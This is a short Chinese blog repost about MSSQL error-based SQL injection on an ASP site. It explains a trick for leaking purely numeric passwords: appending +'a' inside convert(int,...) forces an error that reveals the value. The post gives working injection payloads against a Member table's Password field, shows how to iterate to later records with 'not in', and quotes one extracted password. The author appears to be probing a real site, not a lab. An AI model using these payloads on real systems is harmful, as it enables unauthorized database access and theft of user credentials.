码迷,mamicode.com
首页 > 数据库 > 详细

MSSQL显错注入爆数字型数据的一点思考

时间:2015-03-07 13:48:52      阅读:120      评论:0      收藏:0      [点我收藏+]

标签:

Title:MSSQL显错注入爆数字型数据的一点思考 --2011-02-22 15:23

MSSQL+ASP

最近在弄个站点,密码是纯数字的,convert(int,())转换出来不报错,也不知道其他人用的什么函数或者类型来爆密码像"11111111"的这样的数据的,就自己想了下弄了个暂时可以用的方法.

数据库查询如图:

图一:

技术分享

图二:


技术分享

图三:

技术分享

图四:

技术分享

图五:

技术分享
下面是实验

表Member 字段Password

语句

‘ or 1=convert(int,(select top 1 password from Member))--

技术分享

技术分享

语句‘  or 1=convert(int,(select top 1 password from member)+‘a‘)--

技术分享

 

 

技术分享
然后查询下一条数据

语句‘  or 1=convert(int,(select top 1 password from member where password not in (‘117517450‘))+‘a‘)--

技术分享



不知道其他人是怎么爆的,可以告诉我的话,留个言,谢谢。

MSSQL显错注入爆数字型数据的一点思考

标签:

原文地址:http://www.cnblogs.com/TeaIng-Index/p/4320139.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!